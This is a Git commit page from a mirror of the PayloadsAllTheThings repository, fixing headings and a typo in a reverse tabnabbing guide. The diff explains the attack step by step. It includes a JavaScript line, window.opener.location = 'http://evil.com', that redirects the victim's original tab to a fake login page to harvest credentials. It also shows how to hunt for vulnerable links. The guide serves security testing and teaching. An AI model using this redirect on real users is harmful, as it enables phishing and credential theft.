ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

typing errors fixed

Browse Source
This commit is contained in:
Max Boll 2020-10-20 11:20:56 +02:00
parent a026ad0727
commit 3671248485
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Tabnabbing/Tabnabbing.md
View File

@ -5,20 +5,20 @@
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Something](#something) * [More information about the vulnerability](#More information about the vulnerability)
* [Subentry 1](#sub1) * [How to exploit](#How to exploit)
* [Subentry 2](#sub2) * [How to hunt for it](#How to hunt for it)
* [References](#references) * [References](#references)
## Tools ## Tools
- [Discover Reverse Tabnabbing - Burp Extention](https://example.com) - [Discover Reverse Tabnabbing - Burp Extention](https://example.com)
## More information about the vulnerability: ## More information about the vulnerability
When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing.
## How to exploit: ## How to exploit
``` ```
1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com"
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
@ -27,14 +27,14 @@ When tabnabbing, the attacker searches for links that are inserted into the webs
5. The victim tries to log on again and the attacker receives the credentials 5. The victim tries to log on again and the attacker receives the credentials
``` ```
## How to hunt for it: ## How to hunt for it
As already mentioned, you have to search for the following link formats: As already mentioned, you have to search for the following link formats:
```html ```html
<a href="..." target="_blank" rel="" /> <a href="..." target="_blank" rel="" />
or or
<a href="..." target="_blamk" /> <a href="..." target="_blank" />
``` ```
## References ## References